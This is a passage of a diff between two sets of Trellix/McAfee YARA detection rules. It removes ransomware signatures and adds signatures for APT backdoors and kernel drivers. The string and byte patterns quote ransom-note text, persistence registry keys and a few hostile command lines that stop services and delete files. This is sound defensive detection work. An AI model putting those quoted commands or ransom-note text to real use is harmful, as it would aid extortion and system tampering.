fullword ascii - $s3 = "The speed, power and complexity of this encryption have been high and if you are now viewing this guide." fullword ascii - $s4 = "Project \"KRAKEN CRYPTOR\" doesn't damage any of your files, this action is reversible if you follow the instructions above." fullword ascii - $s5 = "https://localBitcoins.com" fullword ascii - $s6 = "For the decryption service, we also need your \"KRAKEN ENCRYPTED UNIQUE KEY\" you can see this in the top!" fullword ascii - $s7 = "-----BEGIN KRAKEN ENCRYPTED UNIQUE KEY----- " fullword ascii - $s8 = "All your files has been encrypted by \"KRAKEN CRYPTOR\"." fullword ascii - $s9 = "It means that \"KRAKEN CRYPTOR\" immediately removed form your system!" fullword ascii - $s10 = "After your payment made, all of your encrypted files has been decrypted." fullword ascii - $s11 = "Don't delete .XKHVE files! there are not virus and are your files, but encrypted!" fullword ascii - $s12 = "You can decrypt one of your encrypted smaller file for free in the first contact with us." fullword ascii - $s13 = "You must register on this site and click \"BUY Bitcoins\" then choose your country to find sellers and their prices." fullword ascii - $s14 = "-----END KRAKEN ENCRYPTED UNIQUE KEY-----" fullword ascii - $s15 = "DON'T MODIFY \"KRAKEN ENCRYPT UNIQUE KEY\"." fullword ascii - $s16 = "# Read the following instructions carefully to decrypt your files." fullword ascii - $s17 = "We use best and easy way to communications. It's email support, you can see our emails below." fullword ascii - $s18 = "DON'T USE THIRD PARTY, PUBLIC TOOLS/SOFTWARE TO DECRYPT YOUR FILES, THIS CAUSE DAMAGE YOUR FILES PERMANENTLY." fullword ascii - $s19 = "https://en.wikipedia.org/wiki/Bitcoin" fullword ascii - $s20 = "Please send your message with same subject to both address." fullword ascii + $pdb = "\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy(Winlogon_Shell)\\SetKey_WinlogOn_Shell_Modify\\BD_Installer\\Release\\BD_Installer.pdb" + $pdb1 = "\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy(Winlogon_Shell)\\Dll\\Concealment_Troy(Dll)\\Release\\Concealment_Troy.pdb" condition: - uint16(0)==0x4120 and filesize <9KB and all of them + uint16(0)==0x5a4d and filesize <500KB and any of them } -rule TRELLIX_ARC_Buran_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Turla_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect Buran ransomware" + description = "Rule to detect a component of the APT Turla" author = "Marc Rivero | McAfee ATR Team" - id = "b96c0e5c-dce2-559d-9623-81e8a9a322f2" - date = "2019-11-05" + id = "b39ac7fc-16dd-559e-8ab0-76da5cbbc719" + date = "2017-05-31" modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Buran.yar#L1-L27" + reference = "https://attack.mitre.org/groups/G0010/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_turla_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "056cf2e6aca22876fb8bfafc14a3be0e42124a26edab42a6f7a928c87fb8fff4" + hash = "3b8bd0a0c6069f2d27d759340721b78fd289f92e0a13965262fea4e8907af122" + logic_hash = "d519317c936a38f189bf0de908902ec4e3e079c8c7463c8881ceb332c0a82a26" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Buran" - actor_type = "Cybercrime" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Turla" + actor_type = "Apt" actor_group = "Unknown" strings: - $s1 = { 5? 8B ?? 81 C? ?? ?? ?? ?? 5? 5? 5? 33 ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? C6 ?? ?? ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 8D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? E8 ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 84 ?? 0F 85 } - $s2 = { 4? 33 ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? 8B ?? FF 5? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? E8 ?? ?? ?? ?? 85 ?? 74 } - $s3 = { A1 ?? ?? ?? ?? 99 5? 5? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 03 ?? ?? ?? 13 ?? ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 4? 99 89 ?? ?? 89 ?? ?? FF 7? ?? FF 7? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 3B ?? ?? 75 } - $s4 = { 5? 5? 5? 5? 8B ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 68 ?? ?? ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 89 ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? ?? 0F 84 } - $s5 = { 5? 8B ?? 83 ?? ?? 5? 5? 5? 89 ?? ?? 8B ?? 89 ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 83 ?? ?? 83 ?? ?? 5? 5? A1 ?? ?? ?? ?? 99 E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? 8B ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 2B ?? 8B ?? 4? 5? 8B ?? ?? 8B ?? 83 ?? ?? B9 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 83 ?? ?? 0F 8C } + $pdb = "\\Workshop\\Projects\\cobra\\carbon_system\\x64\\Release\\carbon_system.pdb" condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and filesize <650KB and any of them } -rule TRELLIX_ARC_Robbinhood_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Auriga_Driver : KERNELDRIVER FILE { meta: - description = "Robbinhood GoLang ransowmare" - author = "Christiaan Beek | McAfee ATR" - id = "b2654d00-330e-511e-b8f1-75aa7b57d040" - date = "2019-05-10" + description = "Rule to detect the Auriga driver" + author = "Marc Rivero | McAfee ATR Team" + id = "b61058a1-1b48-5be1-ba2f-74a7c3d38825" + date = "2013-03-13" modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_RobbinHood.yar#L1-L37" + reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_auriga_biscuit.yar#L1-L39" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "9977ba861016edef0c3fb38517a8a68dbf7d3c17de07266cfa515b750b0d249e" - logic_hash = "19a1b7d92bc49dee6da3fb4c053b118e6475aeca43e891d46470c2c09c148038" + hash = "207eee627a76449ac6d2ca43338d28087c8b184e7b7b50fdc60a11950c8283ec" + logic_hash = "c027073ba398fe89d418be67f0850c8d9e4d4c50a991c45b84cdb416497ccf1c" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "KERNELDRIVER, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Robbinhood" - actor_type = "Cybercrime" - actor_group = "Unknown" + malware_type = "kerneldriver" + malware_family = "Driver:W32/Auriga" + actor_type = "APT" + actor_group = "APT1" strings: - $s1 = ".enc_robbinhood" nocase - $s2 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase - $s3 = "pub.key" nocase - $s4 = "main.EnableShadowFucks" nocase - $s5 = "main.EnableRecoveryFCK" nocase - $s6 = "main.EnableLogLaunders" nocase - $s7 = "main.EnableServiceFuck" nocase - $op0 = { 8d 05 2d 98 51 00 89 44 24 30 c7 44 24 34 1d } - $op1 = { 8b 5f 10 01 c3 8b 47 04 81 c3 b5 bc b0 34 8b 4f } - $op2 = { 0f b6 34 18 8d 7e d0 97 80 f8 09 97 77 39 81 fd } + $s1 = "\\SystemRoot\\System32\\netui.dll" fullword wide + $s2 = "\\SystemRoot\\System32\\drivers\\riodrv32.sys" fullword wide + $s3 = "\\SystemRoot\\System32\\arp.exe" fullword wide + $s4 = "netui.dll" fullword ascii + $s5 = "riodrv32.sys" fullword wide + $s6 = "\\netui.dll" fullword wide + $s7 = "d:\\drizt\\projects\\auriga\\branches\\stone_~1\\server\\exe\\i386\\riodrv32.pdb" fullword ascii + $s8 = "\\riodrv32.sys" fullword wide + $s9 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\riodrv32" fullword wide + $s10 = "\\DosDevices\\rio32drv" fullword wide + $s11 = "e\\Driver\\nsiproxy" fullword wide + $s12 = "(C) S3/Diamond Multimedia Systems. All rights reserved." fullword wide + $s13 = "\\Device\\rio32drv" fullword wide + $s14 = "\\Registry\\Machine\\SOFTWARE\\riodrv" fullword wide + $s15 = "\\Registry\\Machine\\SOFTWARE\\riodrv32" fullword wide condition: - ( uint16(0)==0x5a4d and filesize <3000KB and (1 of ($s*)) and all of ($op*)) or ( all of them ) + uint16(0)==0x5a4d and filesize <50KB and all of them } -rule TRELLIX_ARC_Termite_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_APT_Acidbox_Kernelmode_Module : KERNELDRIVER FILE { meta: - description = "Rule to detect the Termite Ransomware" - author = "McAfee ATR Team" - id = "521ec8ee-a54c-57c3-9437-a2ef7f8ed4ca" - date = "2018-08-28" - modified = "2020-10-12" - reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_termite.yar#L1-L32" + description = "Rule to detect the kernel mode component of AcidBox" + author = "Marc Rivero | McAfee ATR Team" + id = "80b60307-5431-5f21-9e6f-06adaab0519d" + date = "2020-07-24" + modified = "2020-08-14" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_acidbox.yar#L1-L32" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "021ca4692d3a721af510f294326a31780d6f8fcd9be2046d1c2a0902a7d58133" - logic_hash = "e5c01e8377957fa25cf6c2031c2680e802b0082a36f50b97b4e488c5bf40e968" + logic_hash = "e39da89d0da22115ac7889bc73ff183973a6c5334e304df955362bde76694d42" score = 75 - quality = 20 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "KERNELDRIVER, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Termite" - actor_type = "Cybercrime" - actor_group = "Unknown" + malware_type = "kerneldriver" + malware_family = "Rootkit:W32/Acidbox" + actor_type = "APT" + actor_group = "Turla" + hash1 = "3ef071e0327e7014dd374d96bed023e6c434df6f98cce88a1e7335a667f6749d" strings: - $s1 = "C:\\Windows\\SysNative\\mswsock.dll" fullword ascii - $s2 = "C:\\Windows\\SysWOW64\\mswsock.dll" fullword ascii - $s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Termite.exe" fullword ascii - $s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Payment.exe" fullword ascii - $s5 = "C:\\Windows\\Termite.exe" fullword ascii - $s6 = "\\Shell\\Open\\Command\\" fullword ascii - $s7 = "t314.520@qq.com" fullword ascii - $s8 = "(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii + $pattern_0 = { 897c2434 8978b8 8d5f28 448bc3 33d2 } + $pattern_1 = { 4c8d842470010000 488d942418010000 498bcf e8???????? 8bd8 89442460 } + $pattern_2 = { 4c8bf1 49d1eb 4585c9 0f88a2000000 440fb717 498bd0 } + $pattern_3 = { ff15???????? 4c8d9c2480000000 498b5b10 498b7318 498b7b20 4d8b7328 498be3 } + $pattern_4 = { 33d2 41b8???????? 895c2420 e8???????? } + $pattern_5 = { 895c2420 4885ff 0f8424010000 440f20c0 84c0 0f8518010000 } + $pattern_6 = { 85f6 0f8469fdffff 488d8424c8010000 41b9???????? } + $pattern_7 = { 894c2404 750a ffc7 893c24 41ffc3 ebcb 85c9 } + $pattern_8 = { 488b5c2450 488b742458 488b7c2460 4883c430 } + $pattern_9 = { 33d2 488b4c2428 e8???????? 448b842450040000 4503c0 4c8d8c2450040000 488bd7 } condition: - ( uint16(0)==0x5a4d and filesize <6000KB) and all of them + 7 of them and filesize <78848 } -rule TRELLIX_ARC_Anatova_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_APT_Acidbox_Main_Module_Dll : BACKDOOR FILE { meta: - description = "Rule to detect the Anatova Ransomware" + description = "Rule to detect the Main mode component of AcidBox" author = "Marc Rivero | McAfee ATR Team" - id = "6e3205aa-42e4-5449-877e-37494cdd096b" - date = "2019-01-22" + id = "8c9beb0f-62f7-5788-8340-0b1ecdf54253" + date = "2020-07-24" modified = "2020-08-14" - reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Anatova.yar#L1-L25" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_acidbox.yar#L34-L65" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "97fb79ca6fc5d24384bf5ae3d01bf5e77f1d2c0716968681e79c097a7d95fb93" - logic_hash = "4fce15ad0ef2d3cb39f6092677f117308f847815cb2a5a491290a1f9d09776df" + logic_hash = "db98e204742b8629074d47df301ffcbb2dfb977a4da91557fb50838aae79e777" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Anatova" - actor_type = "Cybercrime" - actor_group = "Unknown" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Acidbox" + actor_type = "APT" + actor_group = "Turla" + hash1 = "eb30a1822bd6f503f8151cb04bfd315a62fa67dbfe1f573e6fcfd74636ecedd5" strings: - $regex = /anatova[0-9]@tutanota.com/ + $pattern_0 = { 7707 b8022d03a0 eb05 e8???????? } + $pattern_1 = { 4403c8 8bc3 41d1c6 33c6 81c6d6c162ca c1cb02 33c7 } + $pattern_2 = { e9???????? 412b5c2418 8b45dc 412b442408 41015c241c 410144240c 015f1c } + $pattern_3 = { 48895c2408 57 4883ec30 488bfa 33db 4885c9 7479 } + $pattern_4 = { 48895c2408 57 4883ec30 498bd8 488bfa 488364245800 85c9 } + $pattern_5 = { 488987e0010000 e9???????? 81cb001003a0 e9???????? 488b87a0010000 44847806 742e } + $pattern_6 = { 4d8bcc 4c8d0596c50100 498bd4 488bce e8???????? 498b9de0010000 c74605aa993355 } + $pattern_7 = { 4533c0 8d5608 e8???????? 488bf0 4889442460 4885c0 750b } + $pattern_8 = { 488d5558 41c1ee08 41b802000000 44887559 e8???????? 4c8b4de0 894718 } + $pattern_9 = { 4d03c2 4d3bc2 4d13cc 4d0303 4d3b03 4d8903 4c8b13 } condition: - uint16(0)==0x5a4d and filesize <2000KB and $regex + 7 of them and filesize <550912 } -rule TRELLIX_ARC_Backdoorfckg : CTB_LOCKER_RANSOMWARE RANSOMWARE +rule TRELLIX_ARC_APT_Acidbox_Ssp_Dll_Module : BACKDOOR FILE { meta: - description = "CTB_Locker" - author = "ISG" - id = "2a00551d-1f80-5991-9416-d9b1b39db8e9" - date = "2015-01-20" + description = "Rule to detect the SSP DLL component of AcidBox" + author = "Marc Rivero | McAfee ATR Team" + id = "ef1511c5-f650-5e65-937c-466f00932183" + date = "2020-07-24" modified = "2020-08-14" - reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_CTBLocker.yar#L1-L26" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_acidbox.yar#L67-L98" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "a334b07053db66aa0fb2d2b2ca7f94c480509041724ddd4dd1708052d75baffb" + logic_hash = "4c9b9de11d73587ca1ad1efa5455598e41edc5a9a59fc0339c429a212c1c7941" score = 75 - quality = 20 - tags = "CTB_LOCKER_RANSOMWARE, RANSOMWARE" + quality = 70 + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/CTBLocker" - actor_type = "Cybercrime" - actor_group = "Unknown" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Acidbox" + actor_type = "APT" + actor_group = "Turla" + hash1 = "003669761229d3e1db0f5a5b333ef62b3dffcc8e27c821ce9018362e0a2df7e9" strings: - $string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - $stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - $string2 = "keme132.DLL" - $string3 = "klospad.pdb" + $pattern_0 = { 49897ba0 8bc7 49894398 49897ba8 33c9 49894bb0 } + $pattern_1 = { 8b8424a8000000 c1e818 88443108 66895c310a 498b0e } + $pattern_2 = { 8b5f48 413bdd 410f47dd 85db 0f84f1000000 488b4720 4885c0 } + $pattern_3 = { e8???????? 85c0 78c7 488d9424a0020000 488d8c24e0030000 ff15???????? 4c8bf8 } + $pattern_4 = { ff15???????? 488bc8 4c8bc6 33d2 ff15???????? 8bfb 895c2420 } + $pattern_5 = { 415f c3 4c8bdc 49895b10 } + $pattern_6 = { 488d842488010000 4889442420 41bf???????? 458bcf 4c8bc7 418bd7 488d8c2490000000 } + $pattern_7 = { c1e908 0fb6c9 3bce 77b6 8bd0 b9???????? c1ea10 } + $pattern_8 = { 4c8bc3 ba???????? 488d4c2438 e8???????? 89442430 85c0 7508 } + $pattern_9 = { bb02160480 8bc3 488b5c2440 488b742448 488b7c2450 4883c430 } condition: - 3 of them + 7 of them and filesize <199680 } import "pe" -rule TRELLIX_ARC_Ransom_Mespinoza : FILE +rule TRELLIX_ARC_Syskit : FILE { meta: - description = "rule to detect Mespinoza ransomware" - author = "Christiaan Beek @ McAfee ATR" - id = "70a76bc4-e0cb-5caa-bb64-1a732349d2ce" - date = "2020-11-24" - modified = "2020-11-24" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Mespinoza.yar#L3-L27" + description = "SYSkit backdoor" + author = "Christiaan @ McAfee ATR" + id = "f06db38f-52d5-51b5-a17f-63e285dd5f80" + date = "2019-09-17" + modified = "2020-04-02" + reference = "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Tortoiseshell_Syskit.yar#L3-L40" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "e245fb9a71d86209690a6f4c7aa38c10dbd32cda2ea3ecde08d0d94e896381cb" + logic_hash = "5b489d47d56de5c770b6ff6d6d56bf0fb87174f4a8428052b28fb392d9ac3f87" score = 75 - quality = 70 + quality = 68 tags = "FILE" - malware_family = "ransom_Win_Mespinoza" - hash1 = "e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead" - hash2 = "48355bd2a57d92e017bdada911a4b31aa7225c0b12231c9cbda6717616abaea3" - hash3 = "e4287e9708a73ce6a9b7a3e7c72462b01f7cc3c595d972cf2984185ac1a3a4a8" + hash1 = "07d123364d8d04e3fe0bfa4e0e23ddc7050ef039602ecd72baed70e6553c3ae4" + hash2 = "f71732f997c53fa45eef5c988697eb4aa62c8655d8f0be3268636fc23addd193" + hash3 = "02a3296238a3d127a2e517f4949d31914c15d96726fb4902322c065153b364b2" strings: - $s1 = "update.bat" fullword ascii - $s2 = "protonmail.com" fullword ascii - $s3 = "Every byte on any types of your devices was encrypted." fullword ascii - $s4 = "To get all your data back contact us:" fullword ascii - $s5 = "What to do to get all data back?" fullword ascii - $s6 = "Don't try to use backups because it were encrypted too." fullword ascii - $op0 = { 83 f8 4b 75 9e 0f be 46 ff 8d 4d e0 ff 34 85 50 } - $op1 = { c6 05 34 9b 47 00 00 e8 1f 0c 03 00 59 c3 cc cc } - $op2 = { e8 ef c5 fe ff b8 ff ff ff 7f eb 76 8b 4d 0c 85 } + $x1 = "timeout /t 10 & sc stop dllhost & timeout /t 10 & del C:\\Windows\\Temp\\BAK.exe" fullword wide + $s2 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii + $s3 = "C:\\Windows\\Temp\\rconfig.xml" fullword wide + $s4 = "Add-Type -AssemblyName System.IO.Compression.FileSystem" fullword wide + $s5 = "serviceProcessInstaller1" fullword ascii + $s6 = " [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)" fullword wide + $s7 = "exec_cmd2" fullword ascii + $s8 = "exec_cmd" fullword ascii + $s9 = "send_command_result" fullword ascii + $s10 = "mycontent" fullword ascii + $s11 = "Diagnostic Server Host" fullword wide + $s12 = "bytesToBeEncrypted" fullword ascii + $s13 = "createPostRequest" fullword ascii + $s14 = "myhash" fullword ascii + $s15 = "DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5" ascii + $s16 = "circle_time" fullword ascii + $s17 = "ServiceStart_AfterInstall" fullword ascii + $s18 = "serviceInstaller1" fullword ascii + $s19 = "BAK.ProjectInstaller.resources" fullword ascii + $s20 = "Dll host" fullword wide + $op0 = { 96 00 f1 0a 57 02 05 00 34 25 } + $op1 = { 96 00 83 05 5a 01 0e 00 38 28 } + $op2 = { 06 00 00 11 28 4d 00 00 0a 02 6f 4e 00 00 0a 28 } condition: - ( uint16(0)==0x5a4d and filesize <600KB and pe.imphash()=="b5e8bd2552848bb7bf2f28228d014742" and (8 of them ) and 2 of ($op*)) or ( all of them ) + ( uint16(0)==0x5a4d and filesize <50KB and pe.imphash()=="f34d5f2d4577ed6d9ceec516c1f5a744" and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) } -rule TRELLIX_ARC_Unpacked_Shiva_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Babar_Malware : BACKDOOR FILE { meta: - description = "Rule to detect an unpacked sample of Shiva ransomware" + description = "Rule to detect Babar malware" author = "Marc Rivero | McAfee ATR Team" - id = "c6cd4421-216f-5c1f-bb8d-fc8ab00bb72d" - date = "2018-09-05" + id = "3cbb63ce-ff93-51ee-93aa-2594fa1f8dad" + date = "2015-02-18" modified = "2020-08-14" - reference = "https://twitter.com/malwrhunterteam/status/1037424962569732096" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Shiva.yar#L1-L37" + reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_babar_pdb.yar#L1-L35" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "299bebcb18e218254960ef96c2e65a4dc1945dcdfe9fc68550022f99a474f56d" - logic_hash = "8a6a1d9f3b75617d8f07489ecf2867f90ddcf9fbe1db1e7c0f5c26833f88be3f" + hash = "c72a055b677cd9e5e2b2dcbba520425d023d906e6ee609b79c643d9034938ebf" + logic_hash = "02acef92691caed4573b609c111302427b9c27c5ef93f9199c52d75cb13e8615" score = 75 - quality = 66 - tags = "RANSOMWARE, FILE" + quality = 45 + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Shiva" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Babar" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = "c:\\Users\\sys\\Desktop\\v 0.5\\Shiva\\Shiva\\obj\\Debug\\shiva.pdb" fullword ascii - $s2 = "This email will be as confirmation you are ready to pay for decryption key." fullword wide - $s3 = "Your important files are now encrypted due to a security problem with your PC!" fullword wide - $s4 = "write.php?info=" fullword wide - $s5 = " * Do not try to decrypt your data using third party software, it may cause permanent data loss." fullword wide - $s6 = " * Do not rename encrypted files." fullword wide - $s7 = ".compositiontemplate" fullword wide - $s8 = "You have to pay for decryption in Bitcoins. The price depends on how fast you write to us." fullword wide - $s9 = "\\READ_IT.txt" fullword wide - $s10 = ".lastlogin" fullword wide - $s11 = ".logonxp" fullword wide - $s12 = " * Decryption of your files 